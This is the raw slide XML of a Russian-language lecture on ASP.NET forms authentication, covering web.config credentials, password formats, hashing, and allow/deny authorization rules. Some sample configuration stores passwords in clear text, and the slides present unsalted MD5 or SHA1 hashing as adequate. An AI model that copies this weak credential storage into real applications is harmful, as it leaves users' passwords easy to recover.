              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>	 timeout="20"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>	 &lt;credentials passwordFormat="Clear"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>	    &lt;user name="Admin" password="(Admin1)"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>	    &lt;user name="Mario" password="Szpuszta"/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>	    &lt;user name="Matthew" password="MacDonald"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>	&lt;/credentials&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>  &lt;/forms&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>&lt;/authentication&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Можно кодировать пароли в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> с помощью хеширования</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Хеширование это просто однонаправленное шифрование</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Это означает, что пароль будет зашифрован таким образом, что уже не может быть расшифрован</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> (создает хеш код, по нему строку получить уже нельзя).</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Хеширование паролей в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Содержимое 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>В разделе </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>&lt;credentials /&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>элемента </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>&lt;forms /&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>формат пароля задается с помощью атрибута </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>passwordFormat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>, который может иметь следующие значения</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Clear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>пароль хранится в виде текста в элементе</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> &lt;user /&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>  - пароль хранится в хешированном виде с использованием алгоритма </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>MD5.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>SHA1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t> - пароль хранится в хешированном виде с использованием алгоритма</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> SHA1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t> Данное значение используется по умолчанию</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="240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Заголовок 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="1082675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>Сохранение хешированного пароля</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Содержимое 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357188" y="1500188"/>
            <a:ext cx="8572500" cy="5357812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>string hashedPwd =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>FormsAuthentication.HashPasswordForStoringInConfigFile(clearTextPassword, "SHA1");</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Пароль сохраняется в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="2400" smtClean="0"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t> или в базу данных</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Программное редактирование данных о пользователях в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="2400" smtClean="0"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Configuration MyConfig = WebConfigurationManager.OpenWebConfiguration("~/");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ConfigurationSectionGroup SystemWeb = MyConfig.SectionGroups["system.web"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>AuthenticationSection AuthSec =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>(AuthenticationSection)SystemWeb.Sections["authentication"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>AuthSec.Forms.Credentials.Users.Add(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>new FormsAuthenticationUser(UsernameText.Text, PasswordText.Text));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>MyConfig.Save();</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="180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229600" cy="850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>Отказ в доступе анонимным пользователям</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4997450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Для отказа в доступе для всем не аутентифицированным пользователям используется элемент конфигурации </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>&lt;authorization&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t> в котором добавляется новое правило авторизации</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>&lt;configuration&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>&lt;system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>&lt;!-- Other settings omitted. --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>&lt;authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>&lt;deny users="?" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>&lt;/authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>&lt;/system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>&lt;/configuration&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Символ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>(?) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>обозначает всех анонимных пользователей</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Заданное правило говорит о том, что анонимные пользователи не разрешены</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Каждый пользователь должен быть аутентифицирован и в каждом запросе буде требоваться </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>forms authentication ticket (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>который является куки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Иначе </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>ASP.NET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>будет перенаправлять запрос к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>login page (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>что может вызвать ошибку, если такая страница еще не создана</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>В отличии от элемента </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>&lt;authentication&gt;, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>элемент </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>&lt;authorization&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>не ограничен только файлом </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>web.config </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>в корневой папке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>приложения</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Можно использовать этот элемент в любой подпапке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>приложения</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="160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ru-RU" sz="3200" smtClean="0"/>
              <a:t>Отказ в авторизации незарегистрированных пользователей</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>&lt;configuration&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>	&lt;system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>&lt;!-- Other settings omitted. --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>		&lt;authorization&gt;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="1" smtClean="0"/>
              <a:t>			&lt;deny users="?" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>		&lt;/authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>	&lt;/system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>&lt;/configuration&gt;</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smtClean="0"/>
              <a:t>Правила авторизации</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Правила авторизации задаются в элементе&lt;authorization&gt; раздела &lt;system.web&gt; файла web.config. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>&lt;authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>    &lt;allow users="comma-separated list of users"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>          roles="comma-separated list of roles"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>          verbs="comma-separated list of verbs" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>    &lt;deny users="comma-separated list of users"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>         roles="comma-separated list of roles"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>          verbs="comma-separated list of verbs" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>&lt;/authorization&gt;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Windows Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
